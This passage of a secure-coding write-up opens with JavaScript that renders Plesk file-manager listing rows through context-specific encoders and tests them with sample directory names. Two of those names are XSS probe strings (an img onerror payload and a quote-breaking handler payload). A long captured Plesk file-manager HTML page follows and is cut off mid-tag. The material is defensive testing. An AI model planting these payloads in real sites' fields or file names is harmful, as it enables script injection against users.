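  // Same form the captured links use: "/" becomes %2F, "_" is left as is.
  return encodeURIComponent(s);
}

// Render one listing row in the shape of the captured rows, with every
// interpolation routed through the encoder for its context.
function renderRow(name, docroot) {
  const path = docroot + '/' + name + '/';
  return '<tr>' +
    '<td class="select"><input type="checkbox" name="del[]"' +
      ' id="del_' + encodeHtmlAttr(name) + '" value="' + encodeHtmlAttr(name) + '"></td>' +
    '<td><a href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=' +
      encodeQueryParam(path) + '"' +
      ' onMouseOver="f(event, \'' + encodeJsStringInAttr(name) + '\');"' +
      ' title="Rename directory ' + encodeHtmlAttr(name) + '">' +
      encodeHtmlText(name) + '</a></td>' +
    '</tr>';
}

// Number of tag openers in a rendered row: a fixed 9 for the template above.
// If a file name could inject markup, this count would go up.
function tagCount(html) {
  return (html.match(/</g) || []).length;
}

// Constructed inputs: the benign directory name from the capture and two
// hostile names, one aimed at the attribute context, one at the JS handler.
const SAMPLE_NAMES = [
  'App_Data',
  '"><img src=x onerror=alert(1)>',
  "' ); alert(1); //",
];

// Returns the tag count per sample name; every entry should be 9.
function demo() {
  return SAMPLE_NAMES.map(n => ({ name: n, tags: tagCount(renderRow(n, '/httpdocs')) }));
}
```

The invariant checked by `tagCount` is the one a reviewer actually wants from a template: the number of tags in the output depends only on the template, never on the data. Note that the handler context needs both layers; HTML-encoding alone leaves `&#039;` to be decoded back into a quote before the JavaScript parser sees it.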

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f">
   <input type="hidden" name="cmd" value="">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   


<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-create-dir" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_dir_oC();return false;" style=""><BUTTON name="bname_create_dir" id="buttonid-create-dir" type="button" onClick="Event.stop(event);new_dir_oC();return false;">Add New Directory</BUTTON><SPAN id="spanid-create-dir">Add New Directory</SPAN></DIV>
           <DIV class="commonButton" id="bid-create-file" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new file.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_file_oC();return false;" style=""><BUTTON name="bname_create_file" id="buttonid-create-file" type="button" onClick="Event.stop(event);new_file_oC();return false;">Add New File</BUTTON><SPAN id="spanid-create-file">Add New File</SPAN></DIV>
       </div>
       
   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Files</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
       <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"Edit the file."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"View the file."}]); }
           function c(event) { tooltip.set(event, [{"type":"string","string":"i_filemanager__chdir"}]); }
           function d(event) { tooltip.set(event, [{"type":"string","string":"Change access rights to the file or directory."}]); }
           function e(event) { tooltip.set(event, [{"type":"string","string":"Change the file or directory name."}]); }
           function f(event, type) {
               switch (type) {
                   case "pdir":
                       tooltip.set(event, [{"type":"string","string":"Go to the directory one level up."}]);
                       break;
                   case "dir":
                       tooltip.set(event, [{"type":"string","string":"Go inside the directory."}]);
                       break;
                   case "text":
                       tooltip.set(event, [{"type":"string","string":"View the text file contents."}]);
                       break;
                   case "image":
                       tooltip.set(event, [{"type":"string","string":"View the image."}]);
                       break;
                   case "audio":
                       tooltip.set(event, [{"type":"string","string":"Audio file."}]);
                       break;
                   case "security":
                       tooltip.set(event, [{"type":"string","string":"Apache security file."}]);
                       break;
                   case "webscript":
                       tooltip.set(event, [{"type":"string","string":"Webscript page file."}]);
                       break;
                   case "wappage":
                       tooltip.set(event, [{"type":"string","string":"WAP page file."}]);
                       break;
                   case "webpage":
                       tooltip.set(event, [{"type":"string","string":"Web page file."}]);
                       break;
                   case "compressed":
                       tooltip.set(event, [{"type":"string","string":"Compressed file."}]);
                       break;
                   case "unknown_text":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (text data)."}]);
                       break;
                   case "unknown_binary":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (binary data)."}]);
                       break;
               }
           }
           function g(event) { tooltip.set(event, [{"type":"string","string":"Edit the file in a visual editor."}]); }
           function h(event) { tooltip.set(event, [{"type":"string","string":"Editing the file in a visual editor requires Internet Explorer version 5.5 or later."}]); }
           function i(event) { tooltip.set(event, [{"type":"string","string":"Open the file in a browser."}]); }
           function download_hint(event) { tooltip.set(event, [{"type":"string","string":"Download the file."}]); }
           function z() { tooltip.hide(); }

           function bin() { return confirm("This file may be a binary file. Do you want to open it?"); }
       </script>
       <div id="FileListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><DIV class="commonButton" id="bid-remove-selected" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Delete the selected files or directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);remove_oC();return false;" style=""><BUTTON name="bname_remove_selected" id="buttonid-remove-selected" type="button" onClick="Event.stop(event);remove_oC();return false;">Remove</BUTTON><SPAN id="spanid-remove-selected">Remove</SPAN></DIV><DIV class="commonButton" id="bid-touch" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to change the timestamp.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);touch_oC();return false;" style=""><BUTTON name="bname_touch" id="buttonid-touch" type="button" onClick="Event.stop(event);touch_oC();return false;">Change Timestamp</BUTTON><SPAN id="spanid-touch">Change Timestamp</SPAN></DIV><DIV class="commonButton" id="bid-copy-move" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to copy or move to another directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);copy_move_oC();return false;" style=""><BUTTON name="bname_copy_move" id="buttonid-copy-move" type="button" onClick="Event.stop(event);copy_move_oC();return false;">Copy/Move</BUTTON><SPAN id="spanid-copy-move">Copy/Move</SPAN></DIV><DIV class="commonButton" id="bid-count-size" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Calculate the total size of selected files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);count_size_oC();return 
false;" style=""><BUTTON name="bname_count_size" id="buttonid-count-size" type="button" onClick="Event.stop(event);count_size_oC();return false;">Calculate Size</BUTTON><SPAN id="spanid-count-size">Calculate Size</SPAN></DIV><DIV class="commonButton" id="bid-extract-archive" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Extract files from the selected archives into the current directory. Note that the file names may be displayed improperly after the extraction if they contain national characters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);extract_oC();return false;" style=""><BUTTON name="bname_extract_archive" id="buttonid-extract-archive" type="button" onClick="Event.stop(event);extract_oC();return false;">Extract Files</BUTTON><SPAN id="spanid-extract-archive">Extract Files</SPAN></DIV></div></td><td class="misc"><div id="FileListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);FileListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);FileListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table 
width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div><TABLE cellspacing="0" class="searchSimple"><TR><TD><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></TD><TD><DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV></TD></TR></TABLE></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>9 <A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" 
onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="name"><table width="100%" cellspacing="0" class="list"><TR><th width="0" class="select"><input type="checkbox" class="checkbox" name="FileListSelectAll" value="true" onClick="FileListSelect()"></th><th class="icon"><A href="#" onClick="FileListSort(&#039;type&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by type.&quot;&#125;]);" onMouseOut="tooltip.hide();">T</a></th><th width="65%" class="sort"><A href="#" onClick="FileListSort(&#039;name_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by name.&quot;&#125;]);" onMouseOut="tooltip.hide();">Name</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="15%" class="number"><A href="#" onClick="FileListSort(&#039;size&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by size.&quot;&#125;]);" onMouseOut="tooltip.hide();">Size</a></th><th width="20%" class="number"><A href="#" onClick="FileListSort(&#039;ch_date&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by modification date.&quot;&#125;]);" onMouseOut="tooltip.hide();">Modification date</a></th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, 
&quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td>&nbsp;</td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();" onMouseOver="f(event, &#039;pdir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_pdir.gif" width="16" height="16" alt="file_pdir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">..</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_App_Data" value="App_Data" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();">App_Data</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/App_Data" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=App_Data" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2FApp_Data" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_css" value="css" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" 
title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();">css</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/css" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=css" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fcss" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_img" value="img" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" 
title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();">img</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/img" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=img" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fimg" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_picture_library" value="picture_library" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" 
width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();">picture_library</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/picture_library" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=picture_library" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fpicture_library" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_test" value="test" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" 
onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();">test</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/test" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=test" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Ftest" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_favicon.ico" value="favicon.ico" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" 
onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=favicon.ico" onClick="return bin();;lon();">favicon.ico</a></td><td class="number">17.1&nbsp;KB</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/favicon.ico" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=favicon.ico" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Ffavicon.ico" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=favicon.ico" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_header.js" 
value="header.js" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=header.js" onClick=";lon();" onMouseOver="f(event, &#039;webscript&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_webscript.gif" width="16" height="16" alt="file_webscript.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=header.js" onClick=";lon();">header.js</a></td><td class="number">0.87&nbsp;KB</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/header.js" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=header.js" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fheader.js" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=header.js" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var 
inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_index.html" value="index.html" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=index.html" onClick=";lon();" onMouseOver="f(event, &#039;webpage&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_webpage.gif" width="16" height="16" alt="file_webpage.gif" title=""></a></td><td><A href="/spaw/spaw.php?file_name=/httpdocs/index.html" onClick=";lon();">index.html</a></td><td class="number">9.12&nbsp;KB</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/index.html" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=index.html" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Findex.html" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=index.html" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr></table><div class="paging pagingBottom"><table 
